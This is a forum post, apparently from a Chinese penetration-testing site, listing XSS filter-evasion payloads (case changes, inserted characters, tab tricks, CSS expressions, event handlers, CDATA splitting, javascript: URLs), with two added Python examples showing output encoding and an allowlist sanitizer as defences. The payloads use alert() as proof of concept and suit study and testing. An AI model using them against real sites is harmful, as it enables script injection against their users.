中国网络渗透测试联盟

Title: Cross Site Scripting (XSS) attack techniques

Author: admin    Time: 2012-12-31 09:59
1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use another extension in place of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

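Added example, not part of the original post: items 1, 2, 5 and 6 all work against filters that look for fixed strings such as "<script" or "javascript:". The Python below (standard library only; the blacklist patterns and the sample inputs are constructed here from the variants listed above) shows that a case-sensitive substring blacklist misses most of them, while context-aware output encoding of untrusted text renders every one of them inert, because the browser then never sees a raw "<" or quote to parse as markup.

```python
import html
import re

# Naive blacklist in the style of many early filters: case-sensitive
# substring patterns for "<script" and "javascript:". Constructed here
# only to show why the variants in the post get past it.
NAIVE_PATTERNS = [re.compile(r"<script"), re.compile(r"javascript:")]


def naive_blacklist_blocks(untrusted: str) -> bool:
    """True if the naive blacklist would reject this input."""
    return any(p.search(untrusted) for p in NAIVE_PATTERNS)


def encode_for_html(untrusted: str) -> str:
    """Output encoding for the HTML text and quoted-attribute contexts.

    Every character that can open a tag, close an attribute or start an
    entity is replaced by an entity, so case changes, inserted characters,
    tabs, newlines and backslashes in the input no longer matter: the
    browser renders the text, it does not parse it as markup.
    """
    return html.escape(untrusted, quote=True)


def can_change_markup(rendered: str) -> bool:
    """Does the rendered string still contain a raw tag opener or quote?"""
    return re.search(r"[<>\"']", rendered) is not None


# Constructed inputs, taken from the variants listed in items 1, 2, 5 and 6.
SAMPLES = {
    "mixed_case": "<sCript>alert('d')</scRipT>",
    "extra_chars": "<<script>alert('c')//<</script>",
    "slash_in_tag": '<SCRIPT/SRC="t.js"></SCRIPT>',
    "tab_in_scheme": '<img src="jav\tascript:alert(\'XSS3\')">',
}


def evaluate(samples: dict = SAMPLES) -> dict:
    """For each sample: did the blacklist catch it, and is the encoded
    output free of characters that could change the HTML structure?"""
    report = {}
    for name, payload in samples.items():
        report[name] = {
            "blacklist_blocked": naive_blacklist_blocks(payload),
            "encoded_is_inert": not can_change_markup(encode_for_html(payload)),
        }
    return report


if __name__ == "__main__":
    for name, verdict in evaluate().items():
        print(f"{name:14s} blacklist_blocked={verdict['blacklist_blocked']!s:5} "
              f"encoded_is_inert={verdict['encoded_is_inert']}")
```

Only the "extra_chars" sample happens to contain the literal "<script" and is caught; the other three pass the blacklist untouched, and all four come out inert after encoding. The practical lesson is that filtering input by pattern is a losing game, whereas encoding at output time for the context the data lands in (HTML text here; attribute, URL and JavaScript contexts each need their own encoder) does not depend on recognising the payload at all.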
9. Script in an HTML tag

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code contained in an SWF

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code apart and reassemble it.

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

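Added example for items 6, 9 and 14, not part of the original post: where user-supplied HTML has to be kept rather than encoded, the defence that holds up against the attribute-level tricks above is an allowlist sanitizer, not a blacklist. The Python below (standard library only) keeps a small set of tags and attributes chosen for this example, drops every on* handler and every STYLE, DYNSRC, LOWSRC or BACKGROUND attribute simply because they are not on the list, and accepts href/src values only after normalising away control characters and checking the scheme, so a "jav<TAB>ascript:" URL is recognised for what it is. The tag and attribute allowlists, the scheme list and the sample inputs are all assumptions made for this demonstration.

```python
import html
import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlsplit

# Allowlists assumed for this example: which tags may survive, and which
# attributes each may carry. Anything not listed is dropped, so no on*
# handler, STYLE, DYNSRC, LOWSRC or BACKGROUND attribute gets through and
# no <script>, <style>, <link>, <meta>, <embed>, <iframe>, <frameset> or
# <xml> element survives.
ALLOWED_TAGS = {
    "a": {"href", "title"}, "img": {"src", "alt"},
    "p": set(), "b": set(), "i": set(), "br": set(), "div": set(), "span": set(),
}
VOID_TAGS = {"img", "br"}
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# ASCII control characters and whitespace; browsers skip these inside a
# scheme, which is what the tab/newline trick in item 6 relies on.
_CONTROL = re.compile(r"[\x00-\x20\x7f]")


def safe_url(value: str) -> Optional[str]:
    """Return the URL if its scheme is allowed (or it is relative), else None.

    The scheme is decided on a copy with control characters removed, so
    "jav<TAB>ascript:" is recognised as "javascript:". Entity-encoded
    forms (item 8) are already decoded by html.parser before we see them.
    """
    scheme = urlsplit(_CONTROL.sub("", value)).scheme.lower()
    if scheme == "" or scheme in ALLOWED_SCHEMES:
        return value.strip()
    return None


class AllowlistSanitizer(HTMLParser):
    """Rebuilds a fragment keeping only allowlisted tags and attributes."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.dropped: list[tuple[str, str]] = []  # what was removed, for logging
        self._skip = 0  # >0 while inside <script>/<style> content

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        if tag not in ALLOWED_TAGS:
            self.dropped.append(("tag", tag))
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            # Event handlers (item 9) and every other non-allowlisted attribute go.
            if name.startswith("on") or name not in ALLOWED_TAGS[tag]:
                self.dropped.append(("attr", f"{tag}@{name}"))
                continue
            if name in URL_ATTRS:
                checked = safe_url(value)
                if checked is None:
                    self.dropped.append(("url", f"{tag}@{name}"))
                    continue
                value = checked
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data))  # text is re-encoded, never raw


def sanitize(fragment: str) -> tuple[str, list[tuple[str, str]]]:
    """Return (clean_html, dropped_items) for an untrusted fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out), parser.dropped


if __name__ == "__main__":
    # Constructed inputs built from the payload shapes in items 6, 9 and 14.
    for sample in [
        "<IMG SRC=\"jav\tascript:alert('XSS3')\">",
        "<body onload=\"alert('onload')\">hello</body>",
        "<a href=\"http://example.com/\" onclick=\"alert(1)\">link</a>",
        "<IFRAME SRC=javascript:alert('13')></IFRAME>",
    ]:
        clean, dropped = sanitize(sample)
        print(repr(clean), dropped)
```

The dropped list is worth keeping: logging it turns the sanitizer into a detector, since a burst of removed on* attributes or rejected javascript: URLs from one account is a strong signal of probing. In production use a maintained library rather than this sketch, and pair it with a Content-Security-Policy that disallows inline script so that anything the sanitizer misses still cannot execute.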




Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2